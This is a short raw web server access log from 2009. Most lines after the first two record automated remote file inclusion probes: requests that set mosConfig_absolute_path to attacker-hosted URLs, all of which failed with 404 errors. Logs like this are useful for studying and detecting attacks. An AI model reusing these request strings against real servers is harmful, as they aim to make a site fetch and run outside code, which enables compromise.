68.7.228.225 - - [21/Jun/2009:12:09:03 -0700] "GET /bikes/dteel/EQ2/EQ2_26.jpg HTTP/1.1" 200 34440 "http://www.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
68.7.228.225 - - [21/Jun/2009:12:09:05 -0700] "GET /bikes/dteel/EQ2/EQ2_5.jpg HTTP/1.1" 200 36788 "http://www.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:12:09:06 -0700] "GET /logs/access_080404.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.51.133.202 - - [21/Jun/2009:12:09:12 -0700] "GET /logs/access_080201.log//OLE.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.51.133.202 - - [21/Jun/2009:12:09:12 -0700] "GET /OLE.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.51.133.202 - - [21/Jun/2009:12:09:12 -0700] "GET /logs//OLE.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.51.133.202 - - [21/Jun/2009:12:09:12 -0700] "GET /logs/access_080402.log//OLE.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.51.133.202 - - [21/Jun/2009:12:09:13 -0700] "GET /logs/access_080201.log//OLE.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
